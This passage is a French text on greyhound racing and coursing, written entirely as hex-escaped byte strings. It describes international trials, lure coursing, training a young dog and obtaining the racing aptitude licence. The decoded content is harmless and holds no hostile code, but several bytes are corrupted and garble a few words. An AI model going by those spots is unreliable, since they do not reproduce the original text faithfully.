-"\x20\x64\x65\x20\x73\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65" -"\x2e\x0d\x0d\x32\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76" -"\x65\x73\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c" -"\x65\x73\x2e\x20\x28\x49\x2e\x54\x29\x0d\x43\x65\x20\x73\x6f\x6e" -"\x74\x20\x64\x65\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x69" -"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73" -"\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2e\x20\x45\x6c" -"\x6c\x65\x73\x20\x73\x65\x20\x64\x69\x73\x70\x75\x74\x65\x6e\x74" -"\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x2c\x20\x61\x70\x72" -"\xe8\x73\x20\x73\xe9\x6c\x65\x63\x74\x69\x6f\x6e\x73\x20\x73\x6f" -"\x69\x74\x20\x61\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x73\x6f\x69" -"\x74\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\x65\x6e\x20" -"\x73\xe9\x72\x69\x65\x73\x2e\x0d\x45\x6c\x6c\x65\x73\x20\x64\x69" -"\x98\x66\xe8\x72\x65\x6e\x74\x20\x64\x65\x73\x20\x45\x2e\x4e\x2e" -"\x43\x2e\x20\x70\x61\x72\x20\x6c\x61\x20\x72\xe9\x70\x61\x72\x74" -"\x69\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x63\x61\x74\xe9\x67\x6f" -"\x72\x69\x65\x73\x20\x65\x6e\x20\x6c\x27\x61\x62\x73\x65\x6e\x63" -"\x65\x20\x64\x27\x75\x6e\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x69" -"\x6d\x70\x6f\x73\xe9\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65" -"\x2c\x20\x6d\x61\x69\x73\x20\x72\xe9\x75\x6e\x69\x73\x73\x65\x6e" -"\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x65\x73\x20\x63\x6f" -"\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x67\x72\x61" -"\x6e\x64\x65\x20\x76\x61\x6c\x65\x75\x72\x2e\x0d\x0d\x33\x29\x20" -"\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76\x65\x73\x20\x64\x65\x20" -"\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x56\x75\x65\x20" -"\x73\x75\x72\x20\x4c\x65\x75\x72\x72\x65\x20\x28\x45\x2e\x50\x2e" -"\x56\x2e\x4c\x2e\x29\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x64\x65" -"\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x64\x65\x75\x78" -"\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2c\x20\x72\x61" 
-"\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c\x27\x61\x70\x74\x69\x74\x75" -"\x64\x65\x20\xe0\x20\x6c\x61\x20\x63\x68\x61\x73\x73\x65\x2e\x20" -"\x4c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x6f\x75" -"\x72\x73\x75\x69\x76\x65\x6e\x74\x20\x75\x6e\x20\x6c\x65\x75\x72" -"\x72\x65\x20\x73\x75\x72\x20\x75\x6e\x20\x6c\x6f\x6e\x67\x20\x70" -"\x61\x72\x63\x6f\x75\x72\x73\x20\x65\x6e\x20\x73\x6c\x61\x6c\x6f" -"\x6d\x20\x63\x6f\x6d\x70\x72\x65\x6e\x61\x6e\x74\x20\x64\x65\x73" -"\x20\x6f\x62\x73\x74\x61\x63\x6c\x65\x73\x20\x65\x74\x20\x70\x6c" -"\x61\x63\xe9\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x6e\x61\x74\x75" -"\x72\x65\x2e\x20\x43\x68\x61\x63\x75\x6e\x20\x65\x73\x74\x20\x6a" -"\x75\x67\xe9\x20\x73\x75\x72\x20\x73\x6f\x6e\x20\x63\x6f\x6d\x70" -"\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\xe0\x20\x70\x61\x72\x74\x69" -"\x72\x20\x64\x65\x20\x73\x61\x20\x76\x69\x74\x65\x73\x73\x65\x2c" -"\x20\x73\x61\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x63\x65\x2c\x20" -"\x73\x6f\x6e\x20\x61\x72\x64\x65\x75\x72\x2c\x20\x73\x6f\x6e\x20" -"\x61\x73\x74\x75\x63\x65\x2c\x20\x73\x6f\x6e\x20\x63\x6f\x75\x72" -"\x61\x67\x65\x2c\x20\x65\x74\x20\x73\x6f\x6e\x20\x61\x72\x74\x20" -"\x64\x65\x20\x63\x61\x70\x74\x75\x72\x65\x20\xe0\x20\x6c\x27\x61" -"\x72\x72\x69\x76\x35\x65\x2e\x20\x41\x20\x6c\x27\xe9\x74\x72\x61" -"\x6e\x67\x65\x72\x20\x6c\x65\x73\x20\x45\x2e\x50\x2e\x56\x2e\x4c" -"\x2e\x20\x73\x6f\x6e\x74\x20\x61\x70\x70\x65\x6c\xe9\x65\x73\x20" -"\x43\x6f\x75\x72\x73\x69\x6e\x67\x20\x65\x74\x20\x6c\x65\x20\x6a" -"\x75\x67\x65\x6d\x65\x6e\x74\x20\x65\x73\x74\x20\x64\x69\x66\x66" -"\xe9\x72\x65\x6e\x74\x2e\x0d\x0d\x51\x75\x61\x6e\x64\x20\x65\x74" -"\x20\x63\x6f\x6d\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x6d\x65\x6e\x63" -"\x65\x72\x20\x3f\x0d\x4c\x65\x20\x6a\x65\x75\x6e\x65\x20\x4c\xe9" -"\x76\x72\x69\x65\x72\x20\x65\x73\x74\x20\x61\x6d\x65\x6e\xe9\x20" -"\x61\x75\x20\x74\x65\x72\x72\x61\x69\x6e\x20\xe0\x20\x75\x6e\x20" -"\xe2\x67\x65\x20\x63\x6f\x6d\x70\x72\x69\x73\x20\x67\xe9\x6e\xe9" 
-"\x72\x61\x6c\x65\x6d\x65\x6e\x74\x20\x65\x6e\x74\x72\x65\x20\x36" -"\x20\x6d\x6f\x69\x73\x20\x65\x74\x20\x31\x20\x61\x6e\x20\x73\x65" -"\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x2e\x20\x49\x6c\x20" -"\x64\x6f\x69\x74\x20\xea\x74\x72\x65\x20\x61\x73\x73\x65\x7a\x20" -"\x6a\x65\x75\x6e\x65\x20\x70\x6f\x75\x72\x20\x71\x75\x65\x20\x6c" -"\x27\x6f\x6e\x20\x70\x72\x6f\x66\x69\x74\x65\x20\x64\x65\x20\x73" -"\x61\x20\x74\x65\x6e\x64\x61\x6e\x63\x65\x20\x6e\x61\x74\x75\x72" -"\x65\x6c\x6c\x65\x20\xe0\x20\x6a\x6f\x75\x65\x72\x20\x65\x74\x20" -"\x63\x6f\x75\x72\x69\x72\x20\x61\x70\x72\xe8\x73\x20\x75\x6e\x20" -"\x6c\x65\x75\x72\x72\x65\x2c\x20\x6d\x61\x69\x73\x20\x61\x73\x73" -"\x65\x7a\x20\x66\x6f\x72\x6d\xe9\x20\x70\x6f\x75\x72\x20\x6e\x65" -"\x20\x70\x61\x73\x20\x72\x69\x73\x71\x75\x65\x72\x20\x64\x65\x20" -"\x6c\x75\x69\x20\x61\x62\xee\x6d\x65\x72\x20\x6c\x65\x20\x73\x71" -"\x75\x65\x6c\x65\x74\x74\x65\x20\x70\x61\x72\x20\x64\x65\x73\x20" -"\x65\x72\x72\x65\x75\x72\x73\x20\x20\x64\x27\x65\x6e\x74\x72\x61" -"\xee\x6e\x65\x6d\x65\x6e\x74\x2e\x20\x49\x6c\x20\x70\x6f\x75\x72" -"\x72\x61\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20\xe0\x20\x63" -"\x6f\x75\x72\x69\x72\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65" -"\x6d\x65\x6e\x74\x20\x61\x70\x72\xe8\x73\x20\x31\x32\x20\x6f\x75" -"\x20\x31\x35\x20\x6d\x6f\x69\x73\x20\x73\x65\x6c\x6f\x6e\x20\x6c" -"\x61\x20\x72\x61\x63\x65\x2e\x20\x0d\x0d\x4c\x65\x20\x64\x72\x65" -"\x73\x73\x61\x67\x65\x0d\x4f\x6e\x20\x63\x6f\x6d\x6d\x65\x6e\x63" -"\x65\x20\x70\x61\x72\x20\x6c\x27\x68\x61\x62\x69\x74\x75\x65\x72" -"\x20\x61\x75\x78\x20\x62\x72\x75\x69\x74\x73\x2c\x20\x61\x75\x78" -"\x20\x61\x62\x6f\x69\x65\x6d\x65\x6e\x74\x73\x2c\x20\xe0\x20\x6c" -"\x61\x20\x70\x72\xe9\x73\x65\x6e\x63\x65\x20\x64\x27\x61\x75\x74" -"\x72\x65\x73\x20\x63\x68\x69\x65\x6e\x73\x2c\x20\x65\x74\x20\x63" -"\x65\x6c\x61\x20\x70\x65\x75\x74\x20\x73\x65\x6e\x66\x61\x69\x72" -"\x65\x20\x74\x72\xe8\x73\x20\x74\xf4\x74\x2e\x20\x0d\x50\x75\x69" 
-"\x73\x20\x6f\x6e\x20\x6c\x75\x69\x20\x6d\x6f\x6e\x74\x72\x65\x20" -"\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x6f\x6e\x20" -"\x6c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x20\xe0\x20\x63\x6f" -"\x75\x72\x69\x72\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x2e\x0d\x44" -"\x27\x61\x75\x74\x72\x65\x73\x20\x70\x72\xe9\x66\xe8\x72\x65\x6e" -"\x74\x20\x70\x6c\x61\x63\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72" -"\x72\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x70\x6f\x75\x72" -"\x20\x71\x75\x27\x69\x6c\x20\x70\x61\x73\x73\x65\x20\xe0\x20\x67" -"\x72\x61\x6e\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65\x20\x64\x65" -"\x76\x61\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20" -"\x71\x75\x69\x20\x61\x20\x61\x6c\x6f\x72\x73\x20\x6c\x65\x20\x72" -"\xe9\x66\x6c\x65\x78\x65\x20\x64\x65\x20\x70\x61\x72\x74\x69\x72" -"\x20\xe0\x20\x73\x61\x20\x70\x6f\x75\x72\x73\x75\x69\x74\x65\x2e" -"\x20\x49\x6c\x20\x65\x73\x74\x20\x70\x72\xe9\x66\xe9\x72\x61\x62" -"\x6c\x65\x20\x64\x65\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20" -"\x76\x65\x72\x73\x20\x6c\x61\x20\x66\x69\x6e\x20\x64\x75\x20\x70" -"\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x6c\x65\x20\x70\x72\x6f\x70" -"\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x73\x65\x20\x74\x65\x6e\x61" -"\x6e\x74\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x65" -"\x74\x20\x75\x6e\x20\x74\x69\x65\x72\x73\x20\x61\x6d\x65\x6e\x61" -"\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x75" -"\x20\x64\xe9\x70\x61\x72\x74\x2e\x20\x43\x6f\x6d\x6d\x65\x20\x63" -"\x65\x6c\x61\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6d\x6f\x74" -"\x69\x76\xe9\x20\xe0\x20\x6c\x61\x20\x66\x6f\x69\x73\x20\x70\x61" -"\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x72" -"\x65\x76\x65\x6e\x69\x72\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x75" -"\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x71\x75" -"\x69\x20\x64\x6f\x69\x74\x20\x6c\x65\x20\x66\xe9\x6c\x69\x63\x69" -"\x74\x65\x72\x20\x62\x72\x75\x79\x61\x6d\x6d\x65\x6e\x74\x2e\x20" 
-"\x50\x65\x75\x20\xe0\x20\x70\x65\x75\x2c\x20\x6f\x6e\x20\x61\x6c" -"\x6c\x6f\x6e\x67\x65\x20\x6c\x61\x20\x64\x69\x73\x74\x61\x6e\x63" -"\x65\x20\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x70\x61\x72\x63\x6f" -"\x75\x72\x73\x20\x63\x6f\x6d\x70\x6c\x65\x74\x2e\x0d\x4d\x61\x69" -"\x73\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69" -"\x72\x20\x64\x65\x73\x20\x76\x61\x72\x69\x61\x6e\x74\x65\x73\x20" -"\x6d\x75\x6c\x74\x69\x70\x6c\x65\x73\x20\x73\x65\x6c\x6f\x6e\x20" -"\x6c\x65\x73\x20\x63\x6c\x75\x62\x73\x2e\x20\x43\x65\x72\x74\x61" -"\x69\x6e\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x66\x6f\x6e" -"\x74\x20\x6c\x65\x20\x74\x6f\x75\x72\x20\x63\x6f\x6d\x70\x6c\x65" -"\x74\x20\x64\x27\x65\x6d\x62\x6c\xe9\x65\x2c\x20\x64\x27\x61\x75" -"\x74\x72\x65\x73\x20\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20" -"\x64\x27\x75\x6e\x20\x67\x72\x61\x6e\x64\x20\x61\x70\x70\x72\x65" -"\x6e\x74\x69\x73\x73\x61\x67\x65\x2e\x20\x51\x75\x61\x6e\x64\x20" -"\x69\x6c\x20\x63\x6f\x75\x72\x74\x20\x62\x69\x65\x6e\x20\x61\x75" -"\x20\x6c\x65\x75\x72\x72\xbf\x2c\x20\x69\x6c\x20\x65\x73\x74\x20" -"\x70\x72\xea\x74\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x2e\x56" -"\x2e\x4c\x2e\x2e\x20\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x45\x2e" -"\x4e\x2e\x43\x2e\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x61\x70" -"\x70\x65\x6c\xe9\x65\x73\x20\x72\x61\x63\x69\x6e\x67\x2c\x20\x69" -"\x6c\x20\x64\x6f\x69\x74\x20\x61\x66\x66\x72\x6f\x6e\x74\x65\x72" -"\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20\x74\xe2\x63\x68\x65\x73" -"\x20\x3a\x20\x4c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65" -"\x20\xe0\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x72\x20\x6c\x61\x20" -"\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x2c\x20\x6f\x62\x6c\x69\x67" -"\x61\x74\x6f\x69\x72\x65\x20\x70\x6f\x75\x72\x20\xe9\x76\x69\x74" -"\x65\x72\x20\x6c\x65\x73\x20\x62\x61\x74\x61\x69\x6c\x6c\x65\x73" -"\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x70\x6f\x75" -"\x72\x20\x6c\x61\x20\x63\x61\x70\x74\x75\x72\x65\x20\x64\x75\x20" 
-"\x6c\x65\x75\x72\x72\x65\x2e\x20\x49\x6c\x20\x73\x75\x66\x66\x69" -"\x74\x20\x64\x65\x20\x6c\x75\x69\x20\x6d\x65\x74\x74\x72\x65\x20" -"\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x20\x61\x76\x61" -"\x6e\x74\x20\x75\x6e\x20\x64\xe9\x70\x61\x72\x74\x20\x6f\x75\x20" -"\x75\x6e\x65\x20\x70\x72\x6f\x6d\x65\x6e\x61\x64\x65\x2c\x20\x70" -"\x6f\x75\x72\x20\x71\x75\x27\x69\x6c\x20\x61\x73\x73\x6f\x63\x69" -"\x65\x20\x6a\x6f\x69\x65\x20\x65\x74\x20\x6d\x75\x73\x65\x6c\x69" -"\xe8\x72\x65\x2e\x20\x43\x27\x65\x73\x74\x20\x61\x73\x73\x65\x7a" -"\x20\x66\x61\x63\x69\x6c\x65\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70" -"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72\x74\x69\x72\x20" -"\x65\x6e\x20\x62\x6f\x69\x74\x65\x20\x3a\x20\x65\x6e\x74\x72\x65" -"\x72\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x63\x61\x73\x65\x2c\x20" -"\x61\x74\x74\x65\x6e\x64\x72\x65\x20\x6c\x27\x6f\x75\x76\x65\x72" -"\x74\x75\x72\x65\x2c\x20\x62\x6f\x6e\x64\x69\x72\x2e\x20\x43\x27" -"\x65\x73\x74\x20\x65\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x74" -"\x72\xe8\x73\x20\x20\x66\x61\x63\x69\x6c\x65\x3b\x20\x70\x61\x72" -"\x66\x6f\x69\x73\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x6c\x75\x69" -"\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72" -"\x74\x69\x72\x20\x64\x65\x73\x20\x62\x6f\x69\x74\x65\x73\x20\x6f" -"\x75\x76\x65\x72\x74\x65\x73\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70" -"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72" -"\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x20\x63\x6f\x6e\x63" -"\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x43\x27\x65\x73\x74\x20\x75" -"\x6e\x20\x70\x6f\x69\x6e\x74\x20\x71\x75\x69\x20\x70\x65\x75\x74" -"\x20\xea\x74\x72\x65\x20\x64\xe9\x6c\x69\x63\x61\x74\x2e\x20\x53" -"\x69\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e\x27\x65" -"\x73\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x6d\x6f\x74" -"\x69\x76\xe9\x20\x61\x75\x20\x6c\x65\x75\x72\x72\x65\x2c\x20\x73" -"\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\xe9\x74\xe9\x20" 
-"\x74\x72\x6f\x70\x20\x70\x72\x65\x73\x73\xe9\x20\x64\x65\x20\x6c" -"\x65\x20\x6d\x65\x74\x74\x72\x65\x20\x65\x6e\x20\x67\x72\x6f\x75" -"\x70\x65\x20\x73\x61\x6e\x73\x20\x61\x74\x74\x65\x6e\x64\x72\x65" -"\x20\x75\x6e\x20\x62\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65" -"\x20\x65\x6e\x20\x73\x6f\x6c\x6f\x2c\x20\x76\x6f\x75\x73\x20\x61" -"\x6c\x6c\xce\x7a\x20\x61\x75\x20\x64\x65\x76\x61\x6e\x74\x20\x64" -"\x65\x20\x64\xe9\x73\x61\x67\x72\xe9\x6d\x65\x6e\x74\x73\x2e\x20" -"\x49\x6c\x20\x76\x61\x20\x6a\x6f\x75\x65\x72\x20\xe0\x20\x62\x6f" -"\x75\x73\x63\x75\x6c\x65\x72\x20\x6c\x65\x73\x20\x61\x75\x74\x72" -"\x65\x73\x20\x28\x6f\x6e\x20\x64\x69\x74\x20\x71\x75\x27\x69\x6c" -"\x20\x62\x6f\x75\x67\x65\x2c\x20\x71\x75\x27\x69\x6c\x20\x61\x74" -"\x74\x61\x71\x75\x65\x29\x20\x63\x6f\x6d\x6d\x65\x20\x64\x65\x73" -"\x20\x63\x68\x69\x6f\x74\x73\x20\x71\x75\x69\x20\x6a\x6f\x75\x65" -"\x6e\x74\x20\x65\x6e\x73\x65\x6d\x62\x6c\x65\x2e\x20\x4f\x75\x20" -"\x62\x69\x65\x6e\x20\x73\x69\x20\x6c\x65\x20\x6c\x65\x75\x72\x72" -"\x65\x20\x6e\x27\x61\x20\x70\x61\x73\x20\xe9\x74\xe9\x20\x70\x6c" -"\x61\x63\xe9\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20" -"\x62\x6f\x69\x74\x65\x20\x63\x6f\x6d\x6d\x65\x20\x6c\x65\x20\x76" -"\x65\x75\x74\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74" -"\x2c\x20\x6c\x65\x73\x20\x36\x20\x20\x4c\xe9\x76\x72\x69\x65\x72" -"\x73\x20\x76\x6f\x6e\x74\x20\x73\x65\x20\x70\x72\xe9\x63\x69\x70" -"\x69\x74\x65\x72\x20\x76\x65\x72\x73\x20\x6c\x65\x20\x70\x6f\x69" -"\x6e\x74\x20\x6f\xf9\x20\xe9\x74\x61\x69\x74\x20\x6c\x65\x20\x6c" -"\x65\x75\x72\x72\x65\x2c\x20\x64\x27\x6f\xf9\x20\x62\x6f\x75\x73" -"\x63\x75\x6c\x61\x64\x65\x2e\x0d\x44\x27\x61\x75\x74\x72\x65\x73" -"\x20\x6e\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x6e\x74\x20\x70" -"\x61\x73\x20\x64\x27\xea\x74\x72\x65\x20\x72\x61\x74\x74\x72\x61" -"\x70\xe9\x73\x2c\x20\x6f\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9" -"\x73\x20\x61\x75\x20\x74\x6f\x75\x72\x6e\x61\x6e\x74\x20\x3a\x20" 
-"\x69\x6c\x73\x20\x73\x65\x20\x72\x65\x62\x69\x66\x66\x65\x6e\x74" -"\x2e\x0d\x44\x61\x6e\x73\x20\x74\x6f\x75\x73\x20\x63\x65\x73\x20" -"\x63\x61\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e" -"\x65\x20\x70\x65\x75\x74\x20\xea\x74\x72\x65\x20\x61\x63\x63\x65" -"\x70\x74\xe9\x20\x65\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4c" -"\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x76\x61\x20\x64\xe9" -"\x70\x65\x6e\x64\x72\x65\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20" -"\x61\x73\x73\x69\x64\x75\x69\x74\xe9\x20\xe0\x20\x6c\x27\x65\x6e" -"\x74\x72\x61\xee\x6e\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x64\x65" -"\x20\x6c\x61\x20\x76\x61\x6c\x65\x75\x72\x20\x64\x65\x73\x20\x6d" -"\x6f\x6e\x69\x74\x65\x75\x72\x73\x20\x64\x75\x20\x63\x6c\x75\x62" -"\x2e\x20\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x69\x76\x65" -"\x72\x73\x65\x73\x20\x6d\xe9\x74\x68\x6f\x64\x65\x73\x20\x70\x6f" -"\x75\x72\x20\x72\x65\x64\x72\x65\x73\x73\x65\x72\x20\x75\x6e\x20" -"\x61\x74\x74\x61\x71\x75\x61\x6e\x74\x20\x28\x71\x75\x69\x20\x65" -"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x65\x73\x74\x20\x75\x6e" -"\x20\x6a\x6f\x75\x65\x75\x72\x20\x6f\x75\x20\x75\x6e\x20\x63\x72" -"\x61\x69\x6e\x74\x69\x66\x2c\x20\x72\x61\x72\x65\x6d\x65\x6e\x74" -"\x20\x75\x6e\x20\x61\x67\x72\x65\x73\x73\x69\x66\x29\x2e\x0d\x56" -"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x61\x69" -"\x74\x20\x63\x6f\x75\x72\x69\x72\x20\x65\x6e\x20\x67\x72\x6f\x75" -"\x70\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\xea\x74\x20" -"\xe0\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x6c\x65\x20\x64\x72\x6f" -"\x69\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x2e\x0d\x0d\x4c" -"\x65\x20\x70\x61\x73\x73\x61\x67\x65\x20\x64\x75\x20\x42\x41\x43" -"\x0d\x50\x6f\x75\x72\x20\x63\x65\x6c\x61\x20\x69\x6c\x20\x64\x6f" -"\x69\x74\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x42\x72" -"\x65\x76\x65\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20" -"\x61\x75\x78\x20\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28\x42\x2e" 
-"\x41\x2e\x43\x2e\x29\x20\x20\x65\x74\x20\x75\x6e\x65\x20\x61\x74" -"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x76\x61\x6c" -"\x69\x64\x69\x74\xe9\x20\x28\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f" -"\x6c\x6f\x72\xe9\x2c\x20\x6c\x69\x63\x65\x6e\x63\x65\x29\x2e\x0d" -"\x0d\x4f\xf9\x3a\x0d\x4f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65" -"\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x20\x63\x6c\x75" -"\x62\x20\x61\x67\x72\xe9\xe9\x20\x64\x6f\x6e\x74\x20\x64\xe9\x70" -"\x65\x6e\x64\x20\x76\x6f\x74\x72\x65\x20\x6c\x69\x65\x75\x20\x64" -"\x65\x20\x72\xe9\x73\x69\x64\x65\x6e\x63\x65\x20\x28\x73\x61\x75" -"\x66\x20\x50\x61\x72\x69\x73\x20\x6f\xf9\x20\x63\x68\x61\x71\x75" -"\x65\x20\x63\x6c\x75\x62\x20\x63\x6f\x75\x76\x72\x65\x20\x6c\x27" -"\x49\x6c\x65\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x29\x2e\x20" -"\x4d\x61\x69\x73\x20\x73\x75\x72\x20\x64\x65\x6d\x61\x6e\x64\x65" -"\x20\x6d\x6f\x74\x69\x76\xe9\x65\x20\x76\x6f\x75\x73\x20\x70\x6f" -"\x75\x76\x65\x7a\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x65" -"\x20\x64\xe9\x72\x6f\x67\x61\x74\x69\x6f\x6e\x20\x70\x6f\x75\x72" -"\x20\x61\x6c\x6c\x65\x72\x20\x61\x69\x6c\x6c\x65\x75\x72\x73\x2c" -"\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x50\x72\xe9" -"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x63\x6c\x75\x62\x20\x61" -"\x74\x74\x72\x69\x62\x75\x74\x61\x69\x72\x65\x2c\x20\x73\x6f\x69" -"\x74\x20\x65\x6e\x20\x63\x61\x73\x20\x72\x65\x66\x75\x73\x2c\x20" -"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f" -"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x2e\x20\x49\x6c\x20\x66" -"\x61\x75\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x75\x6e\x20" -"\x6d\x6f\x74\x69\x66\x20\xe9\x63\x72\x69\x74\x2e\x0d\x0d\x43\x6f" -"\x6d\x6d\x65\x6e\x74\x20\x3a\x0d\x31\x29\x20\x56\x6f\x75\x73\x20" -"\xe9\x63\x72\x69\x76\x65\x7a\x20\xe0\x20\x6c\x61\x20\x53\x6f\x63" -"\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61\x6c\x65\x20\x43\x61" -"\x6e\x69\x6e\x65\x20\x71\x75\x69\x20\x76\x6f\x75\x73\x20\x76\x65" 
-"\x6e\x64\x20\x75\x6e\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20" -"\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x64\x6f\x6e\x74\x20\x6c\x65" -"\x20\x6d\x6f\x64\xe8\x6c\x65\x20\x65\x73\x74\x20\x64\xe9\x73\x6f" -"\x72\x6d\x61\x69\x73\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x6f\x75" -"\x72\x20\x6c\x61\x20\x46\x72\x61\x6e\x63\x65\x20\x65\x74\x20\x6c" -"\x27\xe9\x74\x72\x61\x6e\x67\x65\x72\x2c\x20\x6d\x61\x69\x73\x20" -"\x71\x75\x69\x20\x6e\x65\x20\x73\x75\x66\x66\x69\x74\x20\x70\x61" -"\x73\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x69\x72\x2e\x20\x0d" -"\x50\x75\x69\x73\x20\x76\x6f\x75\x73\x20\xe9\x63\x72\x69\x76\x65" -"\x7a\x20\x61\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x64" -"\x65\x20\x43\x6c\x75\x62\x20\x70\x6f\x75\x72\x20\x6c\x75\x69\x20" -"\x64\x65\x6d\x61\x6e\x64\x65\x72\x20\x75\x6e\x20\x70\x61\x73\x73" -"\x61\x67\x65\x20\x64\x65\x20\x42\x41\x43\x2c\x20\x61\x75\x20\x6d" 